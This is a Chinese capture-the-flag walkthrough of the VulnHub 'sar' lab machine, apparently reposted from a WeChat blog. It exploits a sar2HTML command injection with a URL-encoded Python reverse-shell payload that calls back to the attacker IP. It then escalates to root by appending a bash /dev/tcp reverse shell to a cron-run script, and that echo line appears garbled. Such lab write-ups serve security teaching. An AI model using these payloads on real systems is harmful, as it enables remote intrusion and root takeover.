sar

admin 2025年4月1日10:38:21评论9 views字数 863阅读2分52秒阅读模式

下载地址:https://download.vulnhub.com/sar/sar.zip

攻击者IP:192.168.56.132 桥接(自动) vmare

受害者IP:192.168.56.151 仅主机 vxbox

参考:https://www.freebuf.com/articles/web/367144.html

主机发现

sar

端口扫描

sar

目录扫描

sar

robots.txt提示访问sar2HTML

sar

上传php马后找不到文件路径

sar

发现存在rce漏洞

searchsploit sar2html

http:///index.php?plot=;

sar

验证漏洞存在

sar

反弹shell

http://192.168.56.151/sar2HTML/index.php?plot=LINUX;python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.132%22,2222));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

sar

sar

可以看到上传路径是http://192.168.56.151/sar2HTML/sarDATA/uPLOAD/shell.php

sar

计划任务提权

sar

每 5 分钟以 root 用户身份执行 finally.sh 脚本,保证在 /var/www/html/ 目录下运行。

finally内容是运行write.sh,www有权限修改write.sh,

sar

echo "bash -c 'exec bash -i &>/dev/tcp/192.168.56.132/33          < -i &>/dev/tcp/192.168.56.132/3333<&1'" >> write.sh

sar

获得root

sar

原文始发于微信公众号(王之暴龙战神):sar

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月1日10:38:21
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   sarhttps://cn-sec.com/archives/3904310.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息